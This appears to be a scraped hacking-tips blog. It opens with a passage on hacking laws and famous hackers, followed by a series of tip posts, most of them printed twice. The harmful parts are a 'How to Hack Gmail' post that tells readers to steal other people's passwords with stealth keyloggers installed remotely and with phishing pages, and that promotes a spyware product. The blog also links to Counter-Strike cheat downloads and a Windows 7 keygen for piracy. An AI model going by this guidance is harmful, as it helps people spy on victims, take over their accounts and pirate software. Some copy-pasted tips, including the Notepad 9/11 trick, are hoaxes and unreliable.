Laws reflect this attitude. In the United States, there are several laws forbidding the practice of hacking. Some, like 18 U.S.C. § 1029, concentrate on the creation, distribution and use of codes and devices that give hackers unauthorized access to computer systems. The language of the law only specifies using or creating such a device with the intent to defraud, so an accused hacker could argue he just used the devices to learn how security systems worked.
Another important law is 18 U.S.C. § 1030, part of which forbids unauthorized access to government computers. Even if a hacker just wants to get into the system, he or she could be breaking the law and be punished for accessing a nonpublic government computer [Source: U.S. Department of Justice].
Punishments range from hefty fines to jail time. Minor offenses may earn a hacker as little as six months’ probation, while other offenses can result in a maximum sentence of 20 years in jail. One formula on the Department of Justice’s Web page factors in the financial damage a hacker causes, added to the number of his victims to determine an appropriate punishment [Source: U.S. Department of Justice].
Hacking a Living
Hackers who obey the law can make a good living. Several companies hire hackers to test their security systems for flaws. Hackers can also make their fortunes by creating useful programs and applications, like Stanford University students Larry Page and Sergey Brin. Page and Brin worked together to create a search engine they eventually named Google. Today, they are tied for 26th place on Forbes’ list of the world’s most wealthy billionaires [source: Forbes].
Other countries have similar laws, some much more vague than legislation in the U.S. A recent German law forbids possession of “hacker tools.” Critics say that the law is too broad and that many legitimate applications fall under its vague definition of hacker tools. Some point out that under this legislation, companies would be breaking the law if they hired hackers to look for flaws in their security systems [source: IDG News Service].
Hackers can commit crimes in one country while sitting comfortably in front of their computers on the other side of the world. Therefore, prosecuting a hacker is a complicated process. Law enforcement officials have to petition countries to extradite suspects in order to hold a trial, and this process can take years. One famous case is the United States’ indictment of hacker Gary McKinnon. Since 2002, McKinnon fought extradition charges to the U.S. for hacking into the Department of Defense and NASA computer systems. McKinnon, who hacked from the United Kingdom, defended himself by claiming that he merely pointed out flaws in important security systems. In April 2007, his battle against extradition came to an end when the British courts denied his appeal [Source: BBC News].
In the next section, we’ll look at some famous and notorious hackers.
Famous Hackers
Steve Jobs and Steve Wozniak, founders of Apple Computers, are both hackers. Some of their early exploits even resemble the questionable activities of some malicious hackers. However, both Jobs and Wozniak outgrew their malicious behavior and began concentrating on creating computer hardware and software. Their efforts helped usher in the age of the personal computer — before Apple, computer systems remained the property of large corporations, too expensive and cumbersome for average consumers.
Linus Torvalds, creator of Linux, is another famous honest hacker. His open source operating system is very popular with other hackers. He has helped promote the concept of open source software, showing that when you open information up to everyone, you can reap amazing benefits.
Richard Stallman, also known as “rms,” founded the GNU Project, a free operating system. He promotes the concept of free software and computer access. He works with organizations like the Free Software Foundation and opposes policies like Digital Rights Management.
On the other end of the spectrum are the black hats of the hacking world. At the age of 16, Jonathan James became the first juvenile hacker to get sent to prison. He committed computer intrusions on some very high-profile victims, including NASA and a Defense Threat Reduction Agency server. Online, Jonathan used the nickname (called a handle) “c0mrade.” Originally sentenced to house arrest, James was sent to prison when he violated parole.
Greg Finley/Getty Images
Hacker Kevin Mitnick, newly released from the Federal Correctional Institution in Lompoc, California.
Kevin Mitnick gained notoriety in the 1980s as a hacker who allegedly broke into the North American Aerospace Defense Command (NORAD) when he was 17 years old. Mitnick’s reputation seemed to grow with every retelling of his exploits, eventually leading to the rumor that Mitnick had made the FBI’s Most Wanted list. In reality, Mitnick was arrested several times for hacking into secure systems, usually to gain access to powerful computer software.
Kevin Poulsen, or Dark Dante, specialized in hacking phone systems. He’s famous for hacking the phones of a radio station called KIIS-FM. Poulsen’s hack allowed only calls originating from his house to make it through to the station, allowing him to win in various radio contests. Since then, he has turned over a new leaf, and now he’s famous for being a senior editor at Wired magazine.
Adrian Lamo hacked into computer systems using computers at libraries and Internet cafes. He would explore high-profile systems for security flaws, exploit the flaws to hack into the system, and then send a message to the corresponding company, letting them know about the security flaw. Unfortunately for Lamo, he was doing this on his own time rather than as a paid consultant — his activities were illegal. He also snooped around a lot, reading sensitive information and giving himself access to confidential material. He was caught after breaking into the computer system belonging to the New York Times.
It’s likely that there are thousands of hackers active online today, but an accurate count is impossible. Many hackers don’t really know what they are doing — they’re just using dangerous tools they don’t completely understand. Others know what they’re doing so well that they can slip in and out of systems without anyone ever knowing.
Delete Navbar From Blog
Hello Friends,
Navbar is worst thing in your blog and want to remove from your blog . then follow the simple instruction
First Login To Blogger
Go To Layout
Edit Html --->In the html code find
Navbar is worst thing in your blog and want to remove from your blog . then follow the simple instruction
First Login To Blogger
Go To Layout
Edit Html --->In the html code find
]]</b:skin>
and copy the below code before ]]</b:skin>
#navbar-iframe { height:0px; visibility:hidden; display:none; }
Save Template and You Are Done.
how to check your antivirus alive or dead
Hello Friends,
Is your computer safe from virus ?...if you are doubt ful use the following code Check if your antivirus is alive or dead...!
Open notepad and paste this:
X5O!P%@AP[4\PZX54(P^)7CC)7}$ EICAR-STANDARD-ANTIVIRUS-TEST- FILE!$H+H*
Save it as eicar.com. The Anti-Virus should stop you (if it does that means its working).
Don't worry about it. European Institute for Computer Anti-virus Research (EICAR) have got people to program Anti-Virus to recognise this as a threat (even tough it's completely harmless)...
Is your computer safe from virus ?...if you are doubt ful use the following code Check if your antivirus is alive or dead...!
Open notepad and paste this:
X5O!P%@AP[4\PZX54(P^)7CC)7}$
Save it as eicar.com. The Anti-Virus should stop you (if it does that means its working).
Don't worry about it. European Institute for Computer Anti-virus Research (EICAR) have got people to program Anti-Virus to recognise this as a threat (even tough it's completely harmless)...
Counter Strike Hack
Hello Friends,
If you are look for Counter Strike Hacks , then you came to the right place. Here is list of best counterstrike hacks, that I found while surfing over internet. With these hacks you will be
invincible .
1) Unreal-Stealth Public v6
Features:
- Trigger : Trig Gun, Trig Knife, Trig Shot Delay Start, Trig Shot Delay End
- ESP : Distance, AbsBBox , Frozen , Weapon , Target, Reload , Barrel , Square , Circle .Cross , Name, Item, Line , Font
- Walls: Hack, Cool
- Models:Bright
- Removals:No Flash %, No Smoke, No Sky
- Screen: Spycam. Menu Color , Hud Color, Crosshair
- Misc: Auto Jump, Auto Pistol, Rifle Switch, Pistol Switch
- Settings: Save Settings, Load Settings
Download Unreal-Stealth Public v6 Hack
2) AbsoHack 9.1.0.15
Features:
- ESP
- Weapon, distance, entity
- 6 Different wallhacks
- White walls
- Inverted lighting
- Wireframe world/models
- Transparent tacticle shield
- Semi transparent entities
- Winamp Support
- No flash/smoke
- No recoil
Download AbsoHack 9.1.0.15 Hack
3) Super Simple Wallhack 6.5
Features:
Perfect Depthrange Style Walls
NoFlash
NoSmoke
NoSky
NoAds (Banners Above Scoreboard & Banners On Walls)
Lambert
Crosshair
F8 (Toggle Crosshair On/Off)
F9 (Toggle Walls DR/ASUS/Off)
F10 (Toggle NoSky On/Off)
F11 (Toggle NoFlash On/Off)
F12 (Toggle Lambert On/Off)
Works In All Games On The HL1 Engine
Download Super Simple Wallhack 6.5 Hack
4) Code 88
Features:
- ESP (Visible)
- Bhop (bunnyjump)
- Russduck
Download Code 88 Hack
5)bi0sBase Lite Esp
Features:
ESP Stuff
- Visible ESP
- Far ESP
- Box ESP
- Distance ESP
- Name ESP
- Weapon ESP
Visual Stuff
- Lambert
- Wallhack
- No Flash
- No Smoke
- Crosshair
- Whitewalls
- WireFrame
- WireModel
- NightMode
- FullBright
Download bi0sBase Lite Esp Hack
6) Powerful CS Hacks
Features:
Unlimited Ammon , Auto Aim Enemy, Aim-Key, Hitbox, BoxESP, NameESP, HealthESP, ArmorESP, XQZ Wallhack, Crosshair, Fullbright, NoSpread, NoRecoil, NoFlash, NoSmoke, Spinhack, Anti-Aim, Bunnyjump, AutoPistol, ThirdPerson
Download Powerful CS Hacks
If you are look for Counter Strike Hacks , then you came to the right place. Here is list of best counterstrike hacks, that I found while surfing over internet. With these hacks you will be
invincible .
1) Unreal-Stealth Public v6
Features:
- Trigger : Trig Gun, Trig Knife, Trig Shot Delay Start, Trig Shot Delay End
- ESP : Distance, AbsBBox , Frozen , Weapon , Target, Reload , Barrel , Square , Circle .Cross , Name, Item, Line , Font
- Walls: Hack, Cool
- Models:Bright
- Removals:No Flash %, No Smoke, No Sky
- Screen: Spycam. Menu Color , Hud Color, Crosshair
- Misc: Auto Jump, Auto Pistol, Rifle Switch, Pistol Switch
- Settings: Save Settings, Load Settings
Download Unreal-Stealth Public v6 Hack
2) AbsoHack 9.1.0.15
Features:
- ESP
- Weapon, distance, entity
- 6 Different wallhacks
- White walls
- Inverted lighting
- Wireframe world/models
- Transparent tacticle shield
- Semi transparent entities
- Winamp Support
- No flash/smoke
- No recoil
Download AbsoHack 9.1.0.15 Hack
3) Super Simple Wallhack 6.5
Features:
Perfect Depthrange Style Walls
NoFlash
NoSmoke
NoSky
NoAds (Banners Above Scoreboard & Banners On Walls)
Lambert
Crosshair
F8 (Toggle Crosshair On/Off)
F9 (Toggle Walls DR/ASUS/Off)
F10 (Toggle NoSky On/Off)
F11 (Toggle NoFlash On/Off)
F12 (Toggle Lambert On/Off)
Works In All Games On The HL1 Engine
Download Super Simple Wallhack 6.5 Hack
4) Code 88
Features:
- ESP (Visible)
- Bhop (bunnyjump)
- Russduck
Download Code 88 Hack
5)bi0sBase Lite Esp
Features:
ESP Stuff
- Visible ESP
- Far ESP
- Box ESP
- Distance ESP
- Name ESP
- Weapon ESP
Visual Stuff
- Lambert
- Wallhack
- No Flash
- No Smoke
- Crosshair
- Whitewalls
- WireFrame
- WireModel
- NightMode
- FullBright
Download bi0sBase Lite Esp Hack
6) Powerful CS Hacks
Features:
Unlimited Ammon , Auto Aim Enemy, Aim-Key, Hitbox, BoxESP, NameESP, HealthESP, ArmorESP, XQZ Wallhack, Crosshair, Fullbright, NoSpread, NoRecoil, NoFlash, NoSmoke, Spinhack, Anti-Aim, Bunnyjump, AutoPistol, ThirdPerson
Download Powerful CS Hacks
How to Hack Gmail Account
Hello Friends,
Gmail is one of the most widely used email services across the globe and it’s no wonder why many people want to hack gmail. So if you are curious to know how to hack a gamil account then this is the post for you. Here in this post I will show you some of the real and working ways to hack gmail and will also make you aware of the common scams and myths associated with hacking gmail.
Before I discuss how to hack gmail I want to make my readers aware of the common scams and myths associated with hacking gmail or any other email. So here we go
1. There is no ready made software/program that will hack gmail just with a click of a button. So never get fooled by something called gmail hacking software. If there exists such program to hack gmail then it’s no more than a scam.
2. Most of the email hacking services on the internet claim to hack gmail password for just a small fee. I have personally tested many of those services and found that most of them are scams.
At this point you may be wondering what are the other ways to hack gmail then. So here are the working ways to hack gmail.
With my experience in the field of hacking and security I can tell you that there are only two ways to hack gmail account.
1. Keylogging
2. Phishing
Any other method to hack gmail other than these two are simply scam or dont work.
The easiest way to hack gmail is through keylogging. It is done using a small program/software called keylogger. This keylogger when installed on any computer will capture each and every keystroke including passwords. Also it works in complete stealth mode by completely hiding itself. So installing a keylogger on the computer is the easiest way to hack gmail. Once the victim logs into his gmail account from this computer his gmail username & password are captured and stored instantly. The stored logs are sent to you via email. But what if you do not have physical access to the computer? Well, still you need not worry since I am going to suggest one of the best keylogger program that support installation on a local computer as well as a remote computer. The following supports remote installation as well.
So to hack any gmail account all you need to do is install the keylogger on the computer from which the victim is likely to login to his gmail account. If you do not have physical access then you need to use the remote installation feature to remotely deploy the kelogger.
The other most commonly used trick to hack Gmail is using a Fake Login Page (also called as Phishing). Today, Fake login pages are the most widely used techniques to hack Gmail. A Fake Login page is a page that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end up loosing it.
However creating a fake login page and taking it online to successfully hack a Gmail password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers to hack Gmail since it’s the easiest way.
Gmail is one of the most widely used email services across the globe and it’s no wonder why many people want to hack gmail. So if you are curious to know how to hack a gamil account then this is the post for you. Here in this post I will show you some of the real and working ways to hack gmail and will also make you aware of the common scams and myths associated with hacking gmail.
Before I discuss how to hack gmail I want to make my readers aware of the common scams and myths associated with hacking gmail or any other email. So here we go
1. There is no ready made software/program that will hack gmail just with a click of a button. So never get fooled by something called gmail hacking software. If there exists such program to hack gmail then it’s no more than a scam.
2. Most of the email hacking services on the internet claim to hack gmail password for just a small fee. I have personally tested many of those services and found that most of them are scams.
At this point you may be wondering what are the other ways to hack gmail then. So here are the working ways to hack gmail.
With my experience in the field of hacking and security I can tell you that there are only two ways to hack gmail account.
1. Keylogging
2. Phishing
Any other method to hack gmail other than these two are simply scam or dont work.
Easiest Way to Hack Gmail
The easiest way to hack gmail is through keylogging. It is done using a small program/software called keylogger. This keylogger when installed on any computer will capture each and every keystroke including passwords. Also it works in complete stealth mode by completely hiding itself. So installing a keylogger on the computer is the easiest way to hack gmail. Once the victim logs into his gmail account from this computer his gmail username & password are captured and stored instantly. The stored logs are sent to you via email. But what if you do not have physical access to the computer? Well, still you need not worry since I am going to suggest one of the best keylogger program that support installation on a local computer as well as a remote computer. The following supports remote installation as well.
SniperSpy
So to hack any gmail account all you need to do is install the keylogger on the computer from which the victim is likely to login to his gmail account. If you do not have physical access then you need to use the remote installation feature to remotely deploy the kelogger.
Other ways to Hack Gmail
The other most commonly used trick to hack Gmail is using a Fake Login Page (also called as Phishing). Today, Fake login pages are the most widely used techniques to hack Gmail. A Fake Login page is a page that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end up loosing it.
However creating a fake login page and taking it online to successfully hack a Gmail password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers to hack Gmail since it’s the easiest way.
Activate Windows 7 with Windows 7 Ultimate Keygen
Hello Friends,
Windows Seven is slowly becoming a bigger success thn Windows Vista .So here we have it now !
Click Generate and it will Generate and copy the serial to the clipboard for
you. All the keys have been put together from MS in a randomized
order.
The generated keys are working for 32 and 64bits and also on
Beta and RC builds.. Even the latest one, 7127
Download Windows 7 Ultimate Keygen
Windows Seven is slowly becoming a bigger success thn Windows Vista .So here we have it now !
Click Generate and it will Generate and copy the serial to the clipboard for
you. All the keys have been put together from MS in a randomized
order.
The generated keys are working for 32 and 64bits and also on
Beta and RC builds.. Even the latest one, 7127
Download Windows 7 Ultimate Keygen
Use calcuator as web browser!!
Hello Friends,
2.Press F1 now.
3. Html help dialog will appear.Now right click the icon available at the top left corner of the dialog.
4.Now select Jump To URL option,a small dialog will open.
5.Type the url preceded by
6.Click ‘ok’.
How to use calc as web browser?
1.Type calc in run.2.Press F1 now.
3. Html help dialog will appear.Now right click the icon available at the top left corner of the dialog.
4.Now select Jump To URL option,a small dialog will open.
5.Type the url preceded by
http://
else it will not work.Eg:http://www.google.com
6.Click ‘ok’.
Amaging Trick With NOTEPAD “world trade centre trick”
Hello Friends,
Did you know that the flight number of the plane that had hit WTC on
9/11 was Q33N .Open your Notepad in ur computer and type the flight
number i.e Q33N..Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.
Did you know that the flight number of the plane that had hit WTC on
9/11 was Q33N .Open your Notepad in ur computer and type the flight
number i.e Q33N..Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.
Mobile Fact
Hello Friends,
Can you dial a number when the key pad is locked..?Not possible,
As far as i know there are two numbers you can dial with the key pad
locked.Try these numbers 112 and 911 .These numbers can be dialed even
with u r keypad locked!
These are for emergency calls.,Working fine with Sony,motorola and Nokia Models.
Can you dial a number when the key pad is locked..?Not possible,
As far as i know there are two numbers you can dial with the key pad
locked.Try these numbers 112 and 911 .These numbers can be dialed even
with u r keypad locked!
These are for emergency calls.,Working fine with Sony,motorola and Nokia Models.
Keyboard Shortcuts
Hello Friends,
Below ate some general keyboard shortcuts..
CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
DELETE (Delete)
SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
CTRL while dragging an item (Copy the selected item)
CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
F2 key (Rename the selected item)
CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
CTRL+A (Select all)
F3 key (Search for a file or a folder)
ALT+ENTER (View the properties for the selected item)
ALT+F4 (Close the active item, or quit the active program)
ALT+ENTER (Display the properties of the selected object)
ALT+SPACEBAR (Open the shortcut menu for the active window)
CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
ALT+TAB (Switch between the open items)
ALT+ESC (Cycle through items in the order that they had been opened)
F6 key (Cycle through the screen elements in a window or on the desktop)
F4 key (Display the Address bar list in My Computer or Windows Explorer)
SHIFT+F10 (Display the shortcut menu for the selected item)
ALT+SPACEBAR (Display the System menu for the active window)
CTRL+ESC (Display the Start menu)
ALT+Underlined letter in a menu name (Display the corresponding menu)
Underlined letter in a command name on an open menu (Perform the corresponding command)
F10 key (Activate the menu bar in the active program)
RIGHT ARROW (Open the next menu to the right, or open a submenu)
LEFT ARROW (Open the next menu to the left, or close a submenu)
F5 key (Update the active window)
BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
ESC (Cancel the current task)
SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
Dialog Box Keyboard Shortcuts
CTRL+TAB (Move forward through the tabs)
CTRL+SHIFT+TAB (Move backward through the tabs)
TAB (Move forward through the options)
SHIFT+TAB (Move backward through the options)
ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
ENTER (Perform the command for the active option or button)
SPACEBAR (Select or clear the check box if the active option is a check box)
Arrow keys (Select a button if the active option is a group of option buttons)
F1 key (Display Help)
F4 key (Display the items in the active list)
BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)
Microsoft Natural Keyboard Shortcuts
Windows Logo (Display or hide the Start menu)
Windows Logo+BREAK (Display the System Properties dialog box)
Windows Logo+D (Display the desktop)
Windows Logo+M (Minimize all of the windows)
Windows Logo+SHIFT+M (Restore the minimized windows)
Windows Logo+E (Open My Computer)
Windows Logo+F (Search for a file or a folder)
CTRL+Windows Logo+F (Search for computers)
Windows Logo+F1 (Display Windows Help)
Windows Logo+ L (Lock the keyboard)
Windows Logo+R (Open the Run dialog box)
Windows Logo+U (Open Utility Manager)
Accessibility Keyboard Shortcuts
Right SHIFT for eight seconds (Switch FilterKeys either on or off)
Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
SHIFT five times (Switch the StickyKeys either on or off)
NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
Windows Logo +U (Open Utility Manager)
Windows Explorer Keyboard Shortcuts
END (Display the bottom of the active window)
HOME (Display the top of the active window)
NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
NUM LOCK+Minus sign (-) (Collapse the selected folder)
LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
Shortcut Keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
RIGHT ARROW (Move to the right or to the beginning of the next line)
LEFT ARROW (Move to the left or to the end of the previous line)
UP ARROW (Move up one row)
DOWN ARROW (Move down one row)
PAGE UP (Move up one screen at a time)
PAGE DOWN (Move down one screen at a time)
HOME (Move to the beginning of the line)
END (Move to the end of the line)
CTRL+HOME (Move to the first character)
CTRL+END (Move to the last character)
SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
CTRL+O (Open a saved console)
CTRL+N (Open a new console)
CTRL+S (Save the open console)
CTRL+M (Add or remove a console item)
CTRL+W (Open a new window)
F5 key (Update the content of all console windows)
ALT+SPACEBAR (Display the MMC window menu)
ALT+F4 (Close the console)
ALT+A (Display the Action menu)
ALT+V (Display the View menu)
ALT+F (Display the File menu)
ALT+O (Display the Favorites menu)
MMC Console Window Keyboard Shortcuts
CTRL+P (Print the current page or active pane)
ALT+Minus sign (-) (Display the window menu for the active console window)
SHIFT+F10 (Display the Action shortcut menu for the selected item)
F1 key (Open the Help topic, if any, for the selected item)
F5 key (Update the content of all console windows)
CTRL+F10 (Maximize the active console window)
CTRL+F5 (Restore the active console window)
ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
F2 key (Rename the selected item)
CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Remote Desktop Connection Navigation
CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
ALT+PAGE UP (Switch between programs from left to right)
ALT+PAGE DOWN (Switch between programs from right to left)
ALT+INSERT (Cycle through the programs in most recently used order)
ALT+HOME (Display the Start menu)
CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
ALT+DELETE (Display the Windows menu)
CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
Microsoft Internet Explorer Navigation
CTRL+B (Open the Organize Favorites dialog box)
CTRL+E (Open the Search bar)
CTRL+F (Start the Find utility)
CTRL+H (Open the History bar)
CTRL+I (Open the Favorites bar)
CTRL+L (Open the Open dialog box)
CTRL+N (Start another instance of the browser with the same Web address)
CT
RL+O (Open the Open dialog box, the same as CTRL+L)
CTRL+P (Open the Print dialog box)
CTRL+R (Update the current Web page)
CTRL+W (Close the current window)
Below ate some general keyboard shortcuts..
CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
DELETE (Delete)
SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
CTRL while dragging an item (Copy the selected item)
CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
F2 key (Rename the selected item)
CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
CTRL+A (Select all)
F3 key (Search for a file or a folder)
ALT+ENTER (View the properties for the selected item)
ALT+F4 (Close the active item, or quit the active program)
ALT+ENTER (Display the properties of the selected object)
ALT+SPACEBAR (Open the shortcut menu for the active window)
CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
ALT+TAB (Switch between the open items)
ALT+ESC (Cycle through items in the order that they had been opened)
F6 key (Cycle through the screen elements in a window or on the desktop)
F4 key (Display the Address bar list in My Computer or Windows Explorer)
SHIFT+F10 (Display the shortcut menu for the selected item)
ALT+SPACEBAR (Display the System menu for the active window)
CTRL+ESC (Display the Start menu)
ALT+Underlined letter in a menu name (Display the corresponding menu)
Underlined letter in a command name on an open menu (Perform the corresponding command)
F10 key (Activate the menu bar in the active program)
RIGHT ARROW (Open the next menu to the right, or open a submenu)
LEFT ARROW (Open the next menu to the left, or close a submenu)
F5 key (Update the active window)
BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
ESC (Cancel the current task)
SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
Dialog Box Keyboard Shortcuts
CTRL+TAB (Move forward through the tabs)
CTRL+SHIFT+TAB (Move backward through the tabs)
TAB (Move forward through the options)
SHIFT+TAB (Move backward through the options)
ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
ENTER (Perform the command for the active option or button)
SPACEBAR (Select or clear the check box if the active option is a check box)
Arrow keys (Select a button if the active option is a group of option buttons)
F1 key (Display Help)
F4 key (Display the items in the active list)
BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)
Microsoft Natural Keyboard Shortcuts
Windows Logo (Display or hide the Start menu)
Windows Logo+BREAK (Display the System Properties dialog box)
Windows Logo+D (Display the desktop)
Windows Logo+M (Minimize all of the windows)
Windows Logo+SHIFT+M (Restore the minimized windows)
Windows Logo+E (Open My Computer)
Windows Logo+F (Search for a file or a folder)
CTRL+Windows Logo+F (Search for computers)
Windows Logo+F1 (Display Windows Help)
Windows Logo+ L (Lock the keyboard)
Windows Logo+R (Open the Run dialog box)
Windows Logo+U (Open Utility Manager)
Accessibility Keyboard Shortcuts
Right SHIFT for eight seconds (Switch FilterKeys either on or off)
Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
SHIFT five times (Switch the StickyKeys either on or off)
NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
Windows Logo +U (Open Utility Manager)
Windows Explorer Keyboard Shortcuts
END (Display the bottom of the active window)
HOME (Display the top of the active window)
NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
NUM LOCK+Minus sign (-) (Collapse the selected folder)
LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
Shortcut Keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
RIGHT ARROW (Move to the right or to the beginning of the next line)
LEFT ARROW (Move to the left or to the end of the previous line)
UP ARROW (Move up one row)
DOWN ARROW (Move down one row)
PAGE UP (Move up one screen at a time)
PAGE DOWN (Move down one screen at a time)
HOME (Move to the beginning of the line)
END (Move to the end of the line)
CTRL+HOME (Move to the first character)
CTRL+END (Move to the last character)
SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
CTRL+O (Open a saved console)
CTRL+N (Open a new console)
CTRL+S (Save the open console)
CTRL+M (Add or remove a console item)
CTRL+W (Open a new window)
F5 key (Update the content of all console windows)
ALT+SPACEBAR (Display the MMC window menu)
ALT+F4 (Close the console)
ALT+A (Display the Action menu)
ALT+V (Display the View menu)
ALT+F (Display the File menu)
ALT+O (Display the Favorites menu)
MMC Console Window Keyboard Shortcuts
CTRL+P (Print the current page or active pane)
ALT+Minus sign (-) (Display the window menu for the active console window)
SHIFT+F10 (Display the Action shortcut menu for the selected item)
F1 key (Open the Help topic, if any, for the selected item)
F5 key (Update the content of all console windows)
CTRL+F10 (Maximize the active console window)
CTRL+F5 (Restore the active console window)
ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
F2 key (Rename the selected item)
CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Remote Desktop Connection Navigation
CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
ALT+PAGE UP (Switch between programs from left to right)
ALT+PAGE DOWN (Switch between programs from right to left)
ALT+INSERT (Cycle through the programs in most recently used order)
ALT+HOME (Display the Start menu)
CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
ALT+DELETE (Display the Windows menu)
CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
Microsoft Internet Explorer Navigation
CTRL+B (Open the Organize Favorites dialog box)
CTRL+E (Open the Search bar)
CTRL+F (Start the Find utility)
CTRL+H (Open the History bar)
CTRL+I (Open the Favorites bar)
CTRL+L (Open the Open dialog box)
CTRL+N (Start another instance of the browser with the same Web address)
CT
RL+O (Open the Open dialog box, the same as CTRL+L)
CTRL+P (Open the Print dialog box)
CTRL+R (Update the current Web page)
CTRL+W (Close the current window)
Sunday, 21 March 2010
Get a Call from your own Cell Phone number || Fun With Mobile
Hello Friends,
Just try the following steps and you’ll get a call to your cell phone from your own number.
1. Just give a missed call to this number. You’ll not be charged!
3. Receive the call.You’ll hear a lady voice asking for a PIN number. Just enter some rubbish number.
4. She say’s- Your PIN cannot be processed and the call disconnects..
Just try the following steps and you’ll get a call to your cell phone from your own number.
1. Just give a missed call to this number. You’ll not be charged!
+41445804650
2. Wait for a few seconds and you’ll get a call to your cell phone from your own number3. Receive the call.You’ll hear a lady voice asking for a PIN number. Just enter some rubbish number.
4. She say’s- Your PIN cannot be processed and the call disconnects..
How To Recover Deleted Files
Hello Friends,
If you have lost important files from your hard drive and if you are sure that they have been deleted, don’t panic! Uneraser is simple software that can help. In this tutorial, we will see how Uneraser works. On this link you can download Uneraser.
For example, I delete movie file on Local Disk (E:) , how to recover movie file?. It is simple
1. Run Uneraser , then select wizard , as shown below
2. When the wizard appears select “Do a lost files scan”, then click Next , as shown below
3. Select partition , where is deleted data, then click Next
4. Uneraser find my deleted movie
5. Now, just save your recover file, as shown below
If you have lost important files from your hard drive and if you are sure that they have been deleted, don’t panic! Uneraser is simple software that can help. In this tutorial, we will see how Uneraser works. On this link you can download Uneraser.
For example, I delete movie file on Local Disk (E:) , how to recover movie file?. It is simple
1. Run Uneraser , then select wizard , as shown below
2. When the wizard appears select “Do a lost files scan”, then click Next , as shown below
3. Select partition , where is deleted data, then click Next
4. Uneraser find my deleted movie
5. Now, just save your recover file, as shown below
How To Access Blocked Web Sites ??
Hello Friends,
Here are the list of proxy website.Proxy websites allows us to bypass our current ISP’s IP and connect to targeted website with a different IP; thus hiding our actual origin from detectable. Internet users use proxy websites for various reasons, some to access websites potentially blocked by their colleges or workplace, some use it to test their scripts.
